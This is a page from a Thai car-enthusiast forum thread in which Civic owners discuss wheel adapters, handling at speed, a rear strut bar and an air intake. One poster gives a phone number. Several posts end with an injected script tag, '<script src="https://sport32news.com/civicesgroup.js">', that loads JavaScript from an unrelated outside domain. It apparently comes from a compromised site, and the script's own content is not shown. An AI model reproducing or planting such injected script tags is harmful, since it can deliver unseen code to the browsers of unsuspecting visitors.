มันอยู่ที่ว่าอะแดปเตอร์มันได้มาตราฐานรึเปล่านะคร้าบแต่มากกว่าร้อยละ 90 ผมว่าไม่เวริ์คคร้าบ อันนี้ต้องพูดถึงคนที่สนใจเรื่องสมรรถนะจริงๅนะคร้าบ แนวเน้นสวยขับชิวก็อีกเรื่องนึง ตัวผมเองเคยทำมาหลายชุดครับ หรือแม้แต่อะแดปเตอร์โรงงานของล้อบางรุ่นก็ตาม ถ้าหลวมหรือการกระจายน้ำหนักผิดพลาดนิดเดียวมันก็เหวี่ยงแล้ว ลองดูคร้าบอาจจะชอบหรือไท่ชอบก็ไก้ ลองหาข้อมูลเยอะคร้าบ 089 1119501 ยินดีแชร์ข้อมูลที่เคยทำมาคร้าบ
phomploy พิมพ์ว่า:
เก็บข้อมูล
อย่าเชื่อมากนะคร้าบผมมั่วไปเรื่อยแหละ


"<script src="https://sport32news.com/civicesgroup.js">
pejung พิมพ์ว่า:
ขอถามหน่อยคับทำไมใส่อแดปเตอร์แล้วขับรถเร็วมันไม่ดีเหรอคับ (เพราะมีโครงการจะทำอแดปเตอร์ใส่อยู่พอดีออฟล้อไม่สวยกำลังตัดสินใจอยู่ ผมขับเร็วและขับทางไกลด้วย)



"<script src="https://sport32news.com/civicesgroup.js">
OUM


เข้าร่วม: 26 มิถุนา 2011
ตอบ: 2313

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2142
ให้คำขอบคุณ: 1465

ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 8 กุมภา 2013 18:47 - แพหลัง DC5 หนึบโคตร กับ Topfuel ในห้องเครื่องเน่าๆ
รอด้วยคน
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
สมชาย


เข้าร่วม: 14 มกรา 2013
ตอบ: 5916

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4245
ให้คำขอบคุณ: 7209

ที่อยู่: อ.บ้านบึง จ.ชลบุรี
ปี: 2001
สี: แดง รอยัล รูบี้ (มุก) (R-522P)
ศุกร์, 8 กุมภา 2013 18:52 - แพหลัง DC5 หนึบโคตร กับ Topfuel ในห้องเครื่องเน่าๆ
เกียร์ธรรมดาใช่ปะครับ ถึงใส่กลองอากาศแบบนี้ได้"<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 8 กุมภา 2013 19:33 - แพหลัง DC5 หนึบโคตร กับ Topfuel ในห้องเครื่องเน่าๆ
OUM พิมพ์ว่า:
รอด้วยคน




"<script src="https://sport32news.com/civicesgroup.js"> ..
สมชาย พิมพ์ว่า:
เกียร์ธรรมดาใช่ปะครับ ถึงใส่กลองอากาศแบบนี้ได้"<script src="https://sport32news.com/civicesgroup.js">




น่าจะใส่ได้หมดนะคร้าบผม ใส่แล้วมาไวขึ้นคร้าบ ขับสนุกขึ้นอีกซัก 5-10 % ประมาณนี้คร้าบ"<script src="https://sport32news.com/civicesgroup.js">
ตอบ
หน้า 2 จาก 3
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.
Loading...